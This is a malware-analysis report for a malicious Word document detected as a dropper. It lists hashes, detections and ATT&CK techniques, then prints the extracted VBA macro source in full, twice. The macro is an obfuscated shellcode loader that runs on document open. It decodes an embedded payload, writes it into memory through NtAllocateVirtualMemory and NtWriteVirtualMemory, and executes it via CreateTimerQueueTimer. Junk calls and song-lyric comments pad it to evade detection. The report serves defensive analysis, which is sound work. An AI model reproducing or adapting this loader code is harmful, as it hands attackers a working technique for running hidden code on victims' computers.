Office (OLE) malware analysis — malicious · 1c72f575d0c9574a

MALICIOUS

Office (OLE)

249.5 KB Created: 2017-09-12 22:55:00 Authoring application: Microsoft Office Word First seen: 2017-09-14

MD5: de9d24103e84c38336c4149877b89d21 SHA-1: eb5178a87d3698b1af60c18e7c82f1f79b35334c SHA-256: 1c72f575d0c9574afcfcaab7e0b89fe0083dbe8ac20c0132a978eb1f6be59641

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6336277-0'. Static analysis revealed the presence of VBA macros within the document, specifically a 'Document_Open' macro. This macro is likely responsible for downloading and executing a secondary payload, a common technique for malware droppers. The document body content appears to be a narrative and does not directly contribute to the malicious functionality, suggesting the macro is the primary vector.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6336277-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6336277-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim expeditious As Long
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13512 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13512 bytes
SHA-256: `6347bd866389f2ec8ebd06b2eebd531a5245b0374d89b7f8fd495e2736af69d8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function halvesgo(calochortus) As String Dim bath As Long libere = "beforementioned" Dim caulked() As Byte Dim bug As String Dim detraction As Variant Dim tiene(63) As Long Dim lowpitched As Long chasse = chasse \ 295 Dim jobbing As Variant Dim aggravable As Long Dim saltatory As Long Dim byname As Long Dim metage(63) As Long tridentiferous = chasse / 122 Dim singulis(6962) As Byte Dim doublespaced As Integer Dim churning(63) As Long Dim insipidly As Long Dim tome As Integer bloke = 27 - 121 + 262238 scrupulously = 6 - 99 + 4125 manful = 124 - 39 + 171 refiner = 36 - 15 + 65515 daub = 115 - 44 - 8 whissky = 124 - 104 + 258028 jaggedness = 1 - 91 + 65370 down = 126 - 115 + 244 Dim lyrebird As Variant gambol = 56 - 90 + 16515106 barbell = 97 - 11 + 16711594 gardening = 108 - 77 + 33 ashamed = 69 - 15 + 4042 Dim bonedry As Integer Dim bareheaded As Long altarstairs = 18 - 41 + 23 delection = 44 - 1 + 7800 Dim bedewed() As Byte Dim cordierite As Variant Dim scrimshanker As Variant bedewed = VBA.StrConv(calochortus, 128) Dim seagod As Variant wallet = 18 benzyl = 24391 chronometrical = 195932 Pmt 0, wallet, 27674, 41409, 3 exalte = 7843 emollient = vbKeyShift - 12 For cubicle = 0 To exalte If cubicle Mod 2 = 0 Then bedewed(cubicle) = bedewed(cubicle) - emollient Else bedewed(cubicle) = bedewed(cubicle) - (emollient - 1) End If Next cubicle changeling = 25 flight = 35689 amyotrophia = 434778 Pmt 0, changeling, 29134, 27921, 7 doublespaced = 0 accost = 73 - 16 - 57 collectivization = 87 - 99 + 55 infreqent = overstrain For saltatory = (7 - 7) * 1 To (50 + 13) * (5 - 4) metage(saltatory) = bootless(saltatory, gardening, 63) churning(saltatory) = bootless(saltatory, ashamed, 63) tiene(saltatory) = bootless(saltatory, bloke, 63) Next saltatory mercurial = 83 dinornis = 27715 anagasta = 221887 Pmt 0, mercurial, 28439, 19214, 7 caulked = bedewed minutes = 69 - 89 + 24 box = 118 band = 23057 intensifying = 159448 Pmt 0, box, 11660, 51971, 3 anguidae = 123 - 30 - 90 chasse = Rnd(161) libere = "disorder" heckelphone = anguidae + 1 haulage = 103 - 30 - 71 For lowpitched = 0 To exalte established = caulked(lowpitched) oldtimer = caulked(lowpitched + 2) confiscation = churning(infreqent(caulked(lowpitched + 1))) oceania = metage(infreqent(oldtimer)) + infreqent(caulked(lowpitched + anguidae)) aggravable = tiene(infreqent(established)) + confiscation + oceania saltatory = bootless(aggravable, barbell, 55) singulis(byname) = bootless(saltatory, refiner, 45) saltatory = bootless(aggravable, jaggedness, 55) singulis(byname + 1) = bootless(saltatory, manful, 45) singulis(byname + haulage) = bootless(aggravable, down, 55) byname = byname + haulage + 1 lowpitched = lowpitched + 3 Next halvesgo = singulis End Function Function infuriation() Dim beret As Integer Dim suspension As String wednesday.vorstellen.Value = Day(#12/5/2013#) varday = eventual = "littorinidae" bandsman = "greenery" somme = "vortex" meningism = "ageless" alloyage = "karat" chatterer = "dolce" henbane = "eventuate" gloved = "rudimental" Set moo = wednesday.vorstellen.SelectedItem enter = 47 shrublet = 21276 roguery = 479669 Pmt 0, enter, 31219, 19031, 8 papiermache = moo.Name cocklebur = 106 - 108 + 7846 neologist = Right(papiermache, cocklebur) averuncate = halvesgo(neologist) rove = 37 pothos = 30041 acarophobia = 415628 Pmt 0, rove, 19041, 49774, 8 haptic = "cetoniidae" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim bowie As Variant Dim tongu As LongPtr Dim talcum As LongPtr Dim flemish As Long Dim discerning As Long Dim entre As LongPtr Dim orthodontics As LongPtr Dim filamentiferous As LongPtr concede = 117 - 108 + 2055 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim sequestrate As String Dim talcum As Long Dim copartnership As Long Dim tongu As Long Dim entre As Long hynerpeton = 109 - 8 + 680 Dim orthodontics As Long Dim filamentiferous As Long concede = hynerpeton + 3459 #End If filiform = 41 - 5 - 36 nonparametric = "drub" bessera = "enlarger" articulation = 32 - 5 + 4069 decant = 101 trypetidae = 2106 sweat = 517771 Pmt 0, decant, 23012, 44360, 2 unalterably = "calloused" illae = "accouplement" voluntariness = "champak" gametophore = "uningenuous" witheringly = 61 soldierlike = 10378 pliers = 175775 Pmt 0, witheringly, 33380, 51109, 2 cleric = averuncate burp = hellenism adductive = "blink" tongu = cestida(cleric) mckinley = herbs Dim assumed As Variant Dim matine As Byte entre = 92 - 57 - 35 talcum = tongu + concede orthodontics = 116 - 19 + 201430 filamentiferous = 125 - 11 + 3386 irreversibility = moosewood(orthodontics, entre, talcum, entre, entre, entre, entre) legalized = 101 specify = 39387 mew = 544138 Pmt 0, legalized, 28936, 28597, 4 End Function Private Sub Document_Open() Dim expeditious As Long Dim annual As Variant carbonyl = "rudera" infuriation castilleja = 18 evulsion = 5930 impersonal = 429392 Pmt 0, castilleja, 29707, 42895, 8 End Sub Attribute VB_Name = "dimidium" ' Knew it was gonna be a long night ' Baby, without warning #If (18 * 3 + 4) > (7 - 3 * 2) And (60 - 5 * 12) * 2 < (Win64) Then ' Baby, without warning ' And hit me like a hurricane Public Declare PtrSafe Function fulgurate Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal uninformative As Any, charinile As Any, ceiba As Any, aspersions As Any) As LongPtr ' Baby, without warning ' Hit me like a hurricane Public Declare PtrSafe Function nonius Lib "ntdll.dll " Alias "AcquireSRWLockShared" (misproportioned As Any) As LongPtr ' But just your sight had my heart storming ' Baby, without warning Public Declare PtrSafe Function cannular Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal hypermodern As Any, ByVal fairway As Any, ByVal natures As Any, ByVal antipsychotic As Any, ByVal centrifugation As Any) As LongPtr ' But just your sight had my heart storming ' From the moment when Public Declare PtrSafe Function motionlessness Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal jussive As Any, accent As Any, acknowledgment As Any, categorized As Any) As LongPtr ' We locked eyes over whiskey on ice ' Then you rolled in with your hair in the wind Public Declare PtrSafe Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (mesonic As Any, ByVal tripsis As Any, ByVal antecubital As Any, ByVal camelot As Any, ByVal capouch As Any, ByVal intervertebral As Any, ByVal defectiveness As Any) As Long ' And hit me like a hurricane' Hit me like a hurricane Public Declare PtrSafe Function aeciospore Lib "ntdll.dll" Alias "NtCreateEventPair" (normalness As LongPtr, fled As LongPtr, chemotaxis As LongPtr) As LongPtr ' I was doing alright ' I wouldnt be in my truck Public Declare PtrSafe Function abbess Lib "Shlwapi.dll" Alias "CreateFileWrapW" (beck As LongPtr) As LongPtr ' Driving us to your house ' Then you rolled in with your hair in the wind Public Declare PtrSafe Function arriere Lib "ntdll.dll " Alias _ "NtAllocateVirtualMemory" (airconditioned As LongPtr, fireeater As LongPtr, ByVal grammatically As LongPtr, unoiledByVal As LongPtr, extirpate As LongPtr, ByVal defective As LongPtr) As LongPtr ' You wrecked my whole world when you came ' But just your sight had my heart storming #End If ' You wrecked my whole world when you came ' Rain was driving, thunder, lightning #If (18 * 3 + 4) > (7 - 3 * 2) And Not (60 - 5 * 12) * 2 < (Win64) Then ' The moon went hiding, stars quit shining ' You wrecked my whole world when you came Public Declare Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (cocopa As Any, ByVal pediculus As Any, ByVal blasphemously As Any, ByVal flora As Any, ByVal achylia As Any, ByVal boatmanship As Any, ByVal disparage As Any) As Long ' The moon went hiding, stars quit shining ' If I woulda just layed my drink down Public Declare Function genetta Lib "ntdll.dll " Alias "AcquireSRWLockShared" (pinchbeck As Any) As Long ' Hit me like a hurricane ' But just your sight had my heart storming Public Declare Function arriere Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (aguets As Long, spiculate As Long, ByVal anomalousness As Long, softishByVal As Long, aukland As Long, ByVal sula As Long) As Long ' But just your sight had my heart storming ' Baby, without warning Public Declare Function dreamer Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal aimlessness As Any, nonfunctional As Any, pelecanus As Any, mont As Any) As Long ' But you rolled in with your hair in the wind ' And hit me like a hurricane Public Declare Function cannular Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal chinaware As Any, ByVal annuity As Any, ByVal choleric As Any, ByVal taxidermist As Any, ByVal ferine As Any) As Long ' Baby, without warning ' But you rolled in with your hair in the wind Public Declare Function crumb Lib "ntdll.dll" Alias "NtCreateEventPair" (forcible As Long, beslaver As Long, acanthoid As Long) As Long ' We locked eyes over whiskey on ice ' If I woulda just layed my drink down Public Declare Function copywriter Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal culmination As Any, institutional As Any, overvalue As Any, acetous As Any) As Long ' If I woulda just layed my drink down ' Rain was driving, thunder, lightning ' From the moment when ' But just your sight had my heart storming #End If ' Rain was driving, thunder, lightning ' And hit me like a hurricane Function bootless(ellipse, amphiprostylar, happens) Select Case happens Case 45 + (10 / 2 - 5) bootless = ellipse \ amphiprostylar Case 55 + (5 - 3) / 2 - 1 bootless = ellipse And amphiprostylar Case 63 + (56 / 7 - 4 * 2) bootless = ellipse * amphiprostylar End Select End Function Attribute VB_Name = "wednesday" Attribute VB_Base = "0{02EFB5F7-614F-4EC3-91E9-A2E684199AA0}{ACD13E8A-B0FF-405A-8B02-436B4B8152A0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "adolfus" Function cestida(sacrificial) Dim stupefaction As Integer Dim mustelus As Long Dim desecrating As Integer Dim beplastered As Integer #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim falconine As Long Dim daylight As LongPtr animatistic = 87 - 46 - 33 Dim guimpe As LongPtr Dim counterspy As Byte Dim carapidae As Variant Dim slithery As LongPtr Dim gowned As String #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim daylight As Long animatistic = 96 - 122 + 30 Dim guimpe As Long Dim slithery As Long #End If pseudowintera = VarPtr(daylight) highlevel = countershot(pseudowintera, VarPtr(sacrificial) + 8, animatistic) dryopteridaceae = 40 - 28 - 13 guimpe = 89 - 104 + 15 bridoon = 77 - 119 + 42 slithery = 114 - 14 + 9472 moonworship = 102 - 62 + 4056 assembled = 123 - 1 - 58 diomedeidae = arriere(ByVal dryopteridaceae, guimpe, ByVal bridoon, slithery, ByVal moonworship, ByVal assembled) tridentiferous = Math.Round(395) chasse = Math.Round(485) countershot guimpe, daylight, 48 - 59 + 5894 figurate = 31 celioma = 10003 pickerel = 487528 Pmt 0, figurate, 10202, 47213, 4 cestida = guimpe End Function Function countershot(consternation, maid, shrimp) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim estonia As String Dim acrophobic As Variant Dim armagnac As LongPtr Dim abalone As LongPtr Dim halter As LongPtr Dim arianism As Long Dim brimming As LongPtr Dim knesset As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim abalone As Long Dim hexagon As Integer Dim armagnac As Long Dim omophagia As Long Dim brimming As Long Dim iodination As String Dim halter As Long Dim golconda As Long Dim knesset As Long Dim dracocephalum As Long Dim reverberate As String #End If cancun = cancun chasse = Math.Round(478) abalone = consternation knesset = shrimp chasse = Fix(206) brimming = maid bibber = 108 altitude = 25970 astringents = 502619 Pmt 0, bibber, 30818, 20080, 3 chasse = Fix(470) armagnac = 123 - 69 - 55 cannular ByVal armagnac, abalone, brimming, knesset, halter zucchini = cancun End Function Function overstrain() Dim composition(255) As Byte dinocerata = 125 - 6 - 54 Do While dinocerata <= 90 + 1 composition(dinocerata) = dinocerata - 65 dinocerata = dinocerata + 1 Loop dinocerata = 48 Do While dinocerata <= 50 + 8 composition(dinocerata) = dinocerata + 4 dinocerata = dinocerata + 1 Loop dinocerata = 97 Do While dinocerata <= 120 + 3 composition(dinocerata) = dinocerata - 71 dinocerata = dinocerata + 1 Loop composition(47) = 63 dinocerata = 43 composition(dinocerata) = 60 + 2 overstrain = composition End Function

SHA-256: 6347bd866389f2ec8ebd06b2eebd531a5245b0374d89b7f8fd495e2736af69d8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Public Function halvesgo(calochortus) As String
Dim bath As Long

libere = "beforementioned"

Dim caulked() As Byte
Dim bug As String
Dim detraction As Variant

Dim tiene(63) As Long
Dim lowpitched As Long
chasse = chasse \ 295

Dim jobbing As Variant

Dim aggravable As Long
Dim saltatory As Long
Dim byname As Long
Dim metage(63) As Long
tridentiferous = chasse / 122

Dim singulis(6962) As Byte
Dim doublespaced As Integer
Dim churning(63) As Long
Dim insipidly As Long

Dim tome As Integer

bloke = 27 - 121 + 262238
scrupulously = 6 - 99 + 4125
manful = 124 - 39 + 171
refiner = 36 - 15 + 65515
daub = 115 - 44 - 8
whissky = 124 - 104 + 258028
jaggedness = 1 - 91 + 65370
down = 126 - 115 + 244
Dim lyrebird As Variant

gambol = 56 - 90 + 16515106
barbell = 97 - 11 + 16711594
gardening = 108 - 77 + 33
ashamed = 69 - 15 + 4042
Dim bonedry As Integer

Dim bareheaded As Long
altarstairs = 18 - 41 + 23
delection = 44 - 1 + 7800
Dim bedewed() As Byte
Dim cordierite As Variant
Dim scrimshanker As Variant
bedewed = VBA.StrConv(calochortus, 128)
Dim seagod As Variant
wallet = 18
benzyl = 24391
chronometrical = 195932
 Pmt 0, wallet, 27674, 41409, 3

exalte = 7843
emollient = vbKeyShift - 12
For cubicle = 0 To exalte
If cubicle Mod 2 = 0 Then
bedewed(cubicle) = bedewed(cubicle) - emollient
Else
bedewed(cubicle) = bedewed(cubicle) - (emollient - 1)
End If
Next cubicle
changeling = 25
flight = 35689
amyotrophia = 434778
 Pmt 0, changeling, 29134, 27921, 7

doublespaced = 0
accost = 73 - 16 - 57
collectivization = 87 - 99 + 55
infreqent = overstrain
For saltatory = (7 - 7) * 1 To (50 + 13) * (5 - 4)
metage(saltatory) = bootless(saltatory, gardening, 63)
churning(saltatory) = bootless(saltatory, ashamed, 63)
tiene(saltatory) = bootless(saltatory, bloke, 63)
Next saltatory
mercurial = 83
dinornis = 27715
anagasta = 221887
 Pmt 0, mercurial, 28439, 19214, 7

caulked = bedewed
minutes = 69 - 89 + 24
box = 118
band = 23057
intensifying = 159448
 Pmt 0, box, 11660, 51971, 3

anguidae = 123 - 30 - 90
chasse = Rnd(161)

libere = "disorder"

heckelphone = anguidae + 1
haulage = 103 - 30 - 71
For lowpitched = 0 To exalte
established = caulked(lowpitched)
oldtimer = caulked(lowpitched + 2)
confiscation = churning(infreqent(caulked(lowpitched + 1)))
oceania = metage(infreqent(oldtimer)) + infreqent(caulked(lowpitched + anguidae))
aggravable = tiene(infreqent(established)) + confiscation + oceania
saltatory = bootless(aggravable, barbell, 55)
singulis(byname) = bootless(saltatory, refiner, 45)
saltatory = bootless(aggravable, jaggedness, 55)
singulis(byname + 1) = bootless(saltatory, manful, 45)
singulis(byname + haulage) = bootless(aggravable, down, 55)
byname = byname + haulage + 1
lowpitched = lowpitched + 3
Next
halvesgo = singulis
End Function


Function infuriation()
Dim beret As Integer
Dim suspension As String
wednesday.vorstellen.Value = Day(#12/5/2013#)
varday = eventual = "littorinidae"
bandsman = "greenery"
somme = "vortex"
meningism = "ageless"
alloyage = "karat"

chatterer = "dolce"
henbane = "eventuate"
gloved = "rudimental"
Set moo = wednesday.vorstellen.SelectedItem
enter = 47
shrublet = 21276
roguery = 479669
 Pmt 0, enter, 31219, 19031, 8

papiermache = moo.Name
cocklebur = 106 - 108 + 7846
neologist = Right(papiermache, cocklebur)
averuncate = halvesgo(neologist)
rove = 37
pothos = 30041
acarophobia = 415628
 Pmt 0, rove, 19041, 49774, 8

haptic = "cetoniidae"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim bowie As Variant
Dim tongu As LongPtr
Dim talcum As LongPtr
Dim flemish As Long

Dim discerning As Long
Dim entre As LongPtr
Dim orthodontics As LongPtr
Dim filamentiferous As LongPtr
concede = 117 - 108 + 2055
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sequestrate As String
Dim talcum As Long
Dim copartnership As Long
Dim tongu As Long

Dim entre As Long
hynerpeton = 109 - 8 + 680
Dim orthodontics As Long
Dim filamentiferous As Long
concede = hynerpeton + 3459
#End If
filiform = 41 - 5 - 36
nonparametric = "drub"
bessera = "enlarger"
articulation = 32 - 5 + 4069
decant = 101
trypetidae = 2106
sweat = 517771
 Pmt 0, decant, 23012, 44360, 2

unalterably = "calloused"
illae = "accouplement"
voluntariness = "champak"
gametophore = "uningenuous"
witheringly = 61
soldierlike = 10378
pliers = 175775
 Pmt 0, witheringly, 33380, 51109, 2

cleric = averuncate
burp = hellenism
adductive = "blink"
tongu = cestida(cleric)
mckinley = herbs
Dim assumed As Variant
Dim matine As Byte
entre = 92 - 57 - 35
talcum = tongu + concede
orthodontics = 116 - 19 + 201430
filamentiferous = 125 - 11 + 3386
irreversibility = moosewood(orthodontics, entre, talcum, entre, entre, entre, entre)
legalized = 101
specify = 39387
mew = 544138
 Pmt 0, legalized, 28936, 28597, 4

End Function

Private Sub Document_Open()
Dim expeditious As Long
Dim annual As Variant
carbonyl = "rudera"
infuriation
castilleja = 18
evulsion = 5930
impersonal = 429392
 Pmt 0, castilleja, 29707, 42895, 8
End Sub

Attribute VB_Name = "dimidium"
'  Knew it was gonna be a long night
'  Baby, without warning
#If (18 * 3 + 4) > (7 - 3 * 2) And (60 - 5 * 12) * 2 < (Win64) Then
'  Baby, without warning
'  And hit me like a hurricane
Public Declare PtrSafe Function fulgurate Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal uninformative As Any, charinile As Any, ceiba As Any, aspersions As Any) As LongPtr
'  Baby, without warning
'  Hit me like a hurricane
Public Declare PtrSafe Function nonius Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (misproportioned As Any) As LongPtr
'  But just your sight had my heart storming
'  Baby, without warning
Public Declare PtrSafe Function cannular Lib "ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal hypermodern As Any, ByVal fairway As Any, ByVal natures As Any, ByVal antipsychotic As Any, ByVal centrifugation As Any) As LongPtr
'  But just your sight had my heart storming
'  From the moment when
Public Declare PtrSafe Function motionlessness Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal jussive As Any, accent As Any, acknowledgment As Any, categorized As Any) As LongPtr
'  We locked eyes over whiskey on ice
'  Then you rolled in with your hair in the wind
Public Declare PtrSafe Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (mesonic As Any, ByVal tripsis As Any, ByVal antecubital As Any, ByVal camelot As Any, ByVal capouch As Any, ByVal intervertebral As Any, ByVal defectiveness As Any) As Long
'  And hit me like a hurricane'  Hit me like a hurricane
Public Declare PtrSafe Function aeciospore Lib "ntdll.dll" Alias "NtCreateEventPair" (normalness As LongPtr, fled As LongPtr, chemotaxis As LongPtr) As LongPtr
'  I was doing alright
'  I wouldnt be in my truck
Public Declare PtrSafe Function abbess Lib "Shlwapi.dll" Alias "CreateFileWrapW" (beck As LongPtr) As LongPtr
'  Driving us to your house
'  Then you rolled in with your hair in the wind
Public Declare PtrSafe Function arriere Lib "ntdll.dll  " Alias _
   "NtAllocateVirtualMemory" (airconditioned As LongPtr, fireeater As LongPtr, ByVal grammatically As LongPtr, unoiledByVal As LongPtr, extirpate As LongPtr, ByVal defective As LongPtr) As LongPtr
'  You wrecked my whole world when you came
'  But just your sight had my heart storming
#End If
'  You wrecked my whole world when you came
'  Rain was driving, thunder, lightning

#If (18 * 3 + 4) > (7 - 3 * 2) And Not (60 - 5 * 12) * 2 < (Win64) Then
'  The moon went hiding, stars quit shining
'  You wrecked my whole world when you came
Public Declare Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (cocopa As Any, ByVal pediculus As Any, ByVal blasphemously As Any, ByVal flora As Any, ByVal achylia As Any, ByVal boatmanship As Any, ByVal disparage As Any) As Long
'  The moon went hiding, stars quit shining
'  If I woulda just layed my drink down
Public Declare Function genetta Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (pinchbeck As Any) As Long
'  Hit me like a hurricane
'  But just your sight had my heart storming
Public Declare Function arriere Lib "Ntdll.dll " Alias _
   "NtAllocateVirtualMemory" (aguets As Long, spiculate As Long, ByVal anomalousness As Long, softishByVal As Long, aukland As Long, ByVal sula As Long) As Long
'  But just your sight had my heart storming
'  Baby, without warning
Public Declare Function dreamer Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal aimlessness As Any, nonfunctional As Any, pelecanus As Any, mont As Any) As Long
'  But you rolled in with your hair in the wind
'  And hit me like a hurricane
Public Declare Function cannular Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal chinaware As Any, ByVal annuity As Any, ByVal choleric As Any, ByVal taxidermist As Any, ByVal ferine As Any) As Long
'  Baby, without warning
'  But you rolled in with your hair in the wind
Public Declare Function crumb Lib "ntdll.dll" Alias "NtCreateEventPair" (forcible As Long, beslaver As Long, acanthoid As Long) As Long
'  We locked eyes over whiskey on ice
'  If I woulda just layed my drink down
Public Declare Function copywriter Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal culmination As Any, institutional As Any, overvalue As Any, acetous As Any) As Long
'  If I woulda just layed my drink down
'  Rain was driving, thunder, lightning

'  From the moment when
'  But just your sight had my heart storming
#End If
'  Rain was driving, thunder, lightning
'  And hit me like a hurricane
Function bootless(ellipse, amphiprostylar, happens)
Select Case happens
Case 45 + (10 / 2 - 5)
bootless = ellipse \ amphiprostylar
Case 55 + (5 - 3) / 2 - 1
bootless = ellipse And amphiprostylar
Case 63 + (56 / 7 - 4 * 2)
bootless = ellipse * amphiprostylar
End Select
End Function




Attribute VB_Name = "wednesday"
Attribute VB_Base = "0{02EFB5F7-614F-4EC3-91E9-A2E684199AA0}{ACD13E8A-B0FF-405A-8B02-436B4B8152A0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "adolfus"


Function cestida(sacrificial)
Dim stupefaction As Integer
Dim mustelus As Long
Dim desecrating As Integer
Dim beplastered As Integer
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim falconine As Long
Dim daylight As LongPtr
animatistic = 87 - 46 - 33
Dim guimpe As LongPtr
Dim counterspy As Byte
Dim carapidae As Variant
Dim slithery As LongPtr
Dim gowned As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim daylight As Long
animatistic = 96 - 122 + 30
Dim guimpe As Long
Dim slithery As Long
#End If
pseudowintera = VarPtr(daylight)
highlevel = countershot(pseudowintera, VarPtr(sacrificial) + 8, animatistic)
dryopteridaceae = 40 - 28 - 13
guimpe = 89 - 104 + 15
bridoon = 77 - 119 + 42
slithery = 114 - 14 + 9472
moonworship = 102 - 62 + 4056
assembled = 123 - 1 - 58
diomedeidae = arriere(ByVal dryopteridaceae, guimpe, ByVal bridoon, slithery, ByVal moonworship, ByVal assembled)
tridentiferous = Math.Round(395)

chasse = Math.Round(485)

countershot guimpe, daylight, 48 - 59 + 5894
figurate = 31
celioma = 10003
pickerel = 487528
 Pmt 0, figurate, 10202, 47213, 4

cestida = guimpe
End Function

Function countershot(consternation, maid, shrimp)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim estonia As String
Dim acrophobic As Variant
Dim armagnac As LongPtr
Dim abalone As LongPtr
Dim halter As LongPtr
Dim arianism As Long
Dim brimming As LongPtr
Dim knesset As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim abalone As Long
Dim hexagon As Integer
Dim armagnac As Long
Dim omophagia As Long
Dim brimming As Long
Dim iodination As String
Dim halter As Long
Dim golconda As Long
Dim knesset As Long
Dim dracocephalum As Long
Dim reverberate As String
#End If
cancun = cancun
chasse = Math.Round(478)
abalone = consternation
knesset = shrimp
chasse = Fix(206)
brimming = maid
bibber = 108
altitude = 25970
astringents = 502619
 Pmt 0, bibber, 30818, 20080, 3

chasse = Fix(470)
armagnac = 123 - 69 - 55
cannular ByVal armagnac, abalone, brimming, knesset, halter
zucchini = cancun
End Function

Function overstrain()
Dim composition(255) As Byte
dinocerata = 125 - 6 - 54
Do While dinocerata <= 90 + 1
composition(dinocerata) = dinocerata - 65
dinocerata = dinocerata + 1
Loop
dinocerata = 48
Do While dinocerata <= 50 + 8
composition(dinocerata) = dinocerata + 4
dinocerata = dinocerata + 1
Loop
dinocerata = 97
Do While dinocerata <= 120 + 3
composition(dinocerata) = dinocerata - 71
dinocerata = dinocerata + 1
Loop
composition(47) = 63
dinocerata = 43
composition(dinocerata) = 60 + 2
overstrain = composition
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.